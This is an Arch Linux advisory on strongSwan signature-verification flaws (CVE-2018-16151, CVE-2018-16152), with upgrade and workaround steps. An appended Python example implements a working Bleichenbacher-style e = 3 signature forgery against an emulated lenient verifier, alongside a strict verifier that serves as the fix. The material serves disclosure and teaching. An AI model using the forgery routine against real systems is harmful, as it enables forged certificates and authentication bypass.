ArchLinux: 201809-4: strongswan: authentication bypass
Summary
- CVE-2018-16151 (authentication bypass)
The OID parser accepts any number of arbitrary bytes after a valid OID in
a PKCS#1 v1.5 signature. asn1_known_oid() only parses until it reaches a
leaf in the tree of known OIDs; any data that follows is ignored, and the
function that parses ASN.1 algorithmIdentifier structures does not check
that the whole OID was consumed, since this usually does not matter.
Because the trailing junk is never rejected, an attacker can carry out a
Bleichenbacher-style attack on keys with a low public exponent and forge
signatures.
- CVE-2018-16152 (authentication bypass)
The algorithmIdentifier structure in a PKCS#1 v1.5 signature contains an
optional parameters field. None of the algorithms used with PKCS#1 take
parameters, so the field should always be encoded as an ASN.1 NULL
value, but the strongSwan decoder does not enforce this and simply skips
over whatever the field contains. An attacker can fill the field with
arbitrary data, which again permits a Bleichenbacher-style attack on
low-exponent keys to forge signatures or create arbitrary CA
certificates.
Resolution
Upgrade to 5.7.0-1.
# pacman -Syu "strongswan>=5.7.0-1"
The problems have been fixed upstream in version 5.7.0.
References
https://wiki.strongswan.org/versions/70
https://github.com/strongswan/strongswan/commit/5955db5b124a1ee5f44c0845b6e00c86fddae67c
https://security.archlinux.org/CVE-2018-16151
https://security.archlinux.org/CVE-2018-16152
Workaround
If the gmp plugin is loaded, make sure that none of the employed keys and
certificates (including those of CAs) use keys with e = 3. strongSwan's
tool to generate keys (pki --gen) always used e = 65537 (0x10001), which
is not vulnerable, so certificates and keys generated with this tool are
fine for use even with an unpatched gmp plugin. The exponent of an
existing certificate or key can be read from the "Exponent" line of
openssl x509 -in cert.pem -noout -text, or the "publicExponent" line of
openssl rsa -in key.pem -noout -text.
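The forgery the summary describes, and the reason the e = 65537 workaround holds, as an added example that is not strongSwan code and not part of the advisory: a minimal lenient PKCS#1 v1.5 verifier that emulates the two parsing gaps (bytes after a known OID ignored, parameters skipped unchecked), a strict verifier that re-encodes and compares as RFC 8017 recommends, and a Bleichenbacher-style e = 3 forgery that places its free bytes inside the OID or inside the parameters field. All names (der, tlv, lenient_verify, strict_verify, iroot, cbrt_mod_2k, forge, demo), the message, and the modulus are constructed for this example; the modulus is a seeded 2048-bit stand-in, since neither the forgery nor the verifier ever uses the private key.

```python
# Added example (not strongSwan code): Bleichenbacher-style e = 3 forgery against a
# lenient PKCS#1 v1.5 verifier that emulates the gaps described in the advisory.
import hashlib
import random

SHA256_OID = bytes.fromhex("608648016503040201")  # id-sha256 (2.16.840.1.101.3.4.2.1)

def der(tag, body):
    """Minimal DER TLV encoder (definite lengths below 64 KiB)."""
    n = len(body)
    ln = bytes([n]) if n < 0x80 else bytes([0x81, n]) if n < 0x100 else bytes([0x82, n >> 8, n & 0xFF])
    return bytes([tag]) + ln + body

def tlv(buf, pos):
    """Read one DER element at pos: (tag, value, position after it)."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        nb = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + nb], "big"), pos + nb
    return tag, buf[pos:pos + ln], pos + ln

def emsa_pkcs1_v15(h, k):
    """The only valid k-byte EM for a SHA-256 digest: 00 01 FF..FF 00 || DigestInfo."""
    t = der(0x30, der(0x30, der(0x06, SHA256_OID) + b"\x05\x00") + der(0x04, h))
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def lenient_verify(n, e, sig, msg):
    """Emulates the flaws: any FF run, trailing bytes after a known OID ignored
    (CVE-2018-16151), parameters skipped unchecked (CVE-2018-16152)."""
    k = (n.bit_length() + 7) // 8
    em, i = pow(sig, e, n).to_bytes(k, "big"), 2
    while i < k and em[i] == 0xFF:
        i += 1
    if em[:2] != b"\x00\x01" or not 10 <= i < k or em[i] != 0:
        return False
    try:
        _, di, _ = tlv(em, i + 1)   # DigestInfo; its length is simply trusted
        _, alg, p = tlv(di, 0)      # AlgorithmIdentifier
        _, oid, q = tlv(alg, 0)
        tlv(alg, q)                 # parameters: parsed past, never inspected
        _, h, _ = tlv(di, p)        # digest
    except IndexError:
        return False
    return oid.startswith(SHA256_OID) and h == hashlib.sha256(msg).digest()

def strict_verify(n, e, sig, msg):
    """The fix: re-encode the one valid EM and compare every byte (RFC 8017)."""
    k = (n.bit_length() + 7) // 8
    return pow(sig, e, n).to_bytes(k, "big") == emsa_pkcs1_v15(hashlib.sha256(msg).digest(), k)

def iroot(x, e):
    """Largest r with r**e <= x (integer Newton iteration from above)."""
    if x < 2:
        return x
    r = 1 << -(-x.bit_length() // e)
    while True:
        y = ((e - 1) * r + x // r ** (e - 1)) // e
        if y >= r:
            return r
        r = y

def cbrt_mod_2k(a, bits):
    """Cube root of odd a modulo 2**bits by bitwise Hensel lifting."""
    r = a & 7                      # x**3 == x (mod 8) for every odd x
    for i in range(3, bits):
        if (r ** 3 - a) >> i & 1:  # flipping bit i of r flips bit i of r**3 and nothing below
            r |= 1 << i
    return r

def forge(n, msg, via="params"):
    """Find s with s**3 = prefix || free bytes || suffix as k bytes (s**3 < n, so the
    verifier never reduces).  The free bytes sit inside the OID or the parameters."""
    k, h = (n.bit_length() + 7) // 8, hashlib.sha256(msg).digest()
    if not h[-1] & 1:
        raise ValueError("need an odd suffix: pick a message whose digest ends in an odd byte")
    for g in range(k, 0, -1):      # largest free size whose layout fills exactly k bytes
        junk = b"\x00" * g         # placeholder, overwritten by whatever the cube yields
        if via == "oid":           # CVE-2018-16151 shape: junk after a valid OID
            alg, suffix = der(0x30, der(0x06, SHA256_OID + junk) + b"\x05\x00"), b"\x05\x00" + der(0x04, h)
        else:                      # CVE-2018-16152 shape: junk as the parameters field
            alg, suffix = der(0x30, der(0x06, SHA256_OID) + der(0x04, junk)), der(0x04, h)
        em = b"\x00\x01" + b"\xff" * 8 + b"\x00" + der(0x30, alg + der(0x04, h))
        if len(em) == k:
            break
    sb, free = 8 * len(suffix), 8 * (g + len(suffix))
    mid = (int.from_bytes(em[:k - g - len(suffix)], "big") << free) + (1 << (free - 1))
    s = iroot(mid, 3)              # cube lands mid-way through the free region, under the prefix
    s = (s >> sb << sb) | cbrt_mod_2k(int.from_bytes(suffix, "big"), sb)  # low bits fix the suffix
    assert s ** 3 < n and (s ** 3).to_bytes(k, "big").endswith(suffix)
    return s

def demo(seed=2018):
    """Constructed key: seeded 2048-bit stand-in modulus (forgery and verifier use only
    (n, e), never the factorization) with e = 3 as in the vulnerable configuration."""
    n = random.Random(seed).getrandbits(2048) | (1 << 2047) | 1
    msg = next(m for m in (b"forged message %d" % i for i in range(256)) if hashlib.sha256(m).digest()[-1] & 1)
    s1, s2 = forge(n, msg, "params"), forge(n, msg, "oid")
    return {"lenient_params": lenient_verify(n, 3, s1, msg), "lenient_oid": lenient_verify(n, 3, s2, msg),
            "strict_any": strict_verify(n, 3, s1, msg) or strict_verify(n, 3, s2, msg),
            "root_bits_e3": iroot(n - 1, 3).bit_length(), "root_e65537": iroot(n - 1, 65537)}

if __name__ == "__main__":
    print(demo())
```

Running demo() shows both forgeries accepted by the lenient verifier and rejected by the strict one. The two root values explain the workaround: with e = 3 the attacker has roughly 683 bits of s to play with before s**3 reaches n, which is enough to pin the prefix with an integer cube root and the suffix with a cube root modulo 2**(8*len(suffix)) while the junk region absorbs the difference; with e = 65537 no base above 1 keeps its power below a 2048-bit n, so the verifier always reduces mod n and there is no root to take. With a 1024-bit modulus and SHA-256 this straightforward prefix/suffix combination does not leave enough slack, which is why the example uses 2048 bits.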